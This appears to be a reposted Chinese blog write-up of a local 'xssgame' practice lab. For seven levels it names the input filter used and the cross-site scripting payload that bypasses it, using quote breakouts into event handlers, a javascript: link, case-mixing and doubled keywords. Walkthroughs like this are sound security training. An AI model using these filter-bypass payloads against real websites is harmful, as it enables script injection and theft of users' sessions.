标签:XSS xssgame http 192.168 Game 替换成 31.177 php
-
很简单的弹窗
http://192.168.31.177/xssgame/level1.php?name=
<script>alert(1)</script>
-
过滤了
>
、<
http://192.168.31.177/xssgame/level2.php?keyword=
" oninput='alert(1)'//
&submit=‘搜索’ -
过滤了
>
、<
、'
用单引号替换了双引号
http://192.168.31.177/xssgame/level3.php?keyword=
' oninput=alert(1) //
&submit=搜索 -
过滤了
>
、<
、"
http://192.168.31.177/xssgame/level4.php?keyword=
" onm ouseover=alert(1)//
&submit=搜索 -
script
替换成scr_ipt
、on事件
替换成了on_事件
利用伪协议
<a href='javascript:alert(1)'>
来执行弹框http://192.168.31.177/xssgame/level5.php?keyword=
"><a href='javascript:alert(1)'> //
&submit=搜索 -
script
替换成scr_ipt
、on事件
替换成了on_事件
、href
替换成了hr_ef
大小写绕过
http://192.168.31.177/xssgame/level6.php?keyword=
"<sCRipt>alert(1)</script>//
&submit=搜索 -
script
、on
、href
直接替换为空双写绕过
http://192.168.31.177/xssgame/level7.php?keyword=
1" oonnmouseover=alert(1)>//
&submit=搜索 -
script
替换成了scr_ipt
、on事件
替换成了on_事件
、href
替换成了hr_ef
标签:XSS,xssgame,http,192.168,Game,替换成,31.177,php 来源: https://www.cnblogs.com/yuxingjiu/p/16484320.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。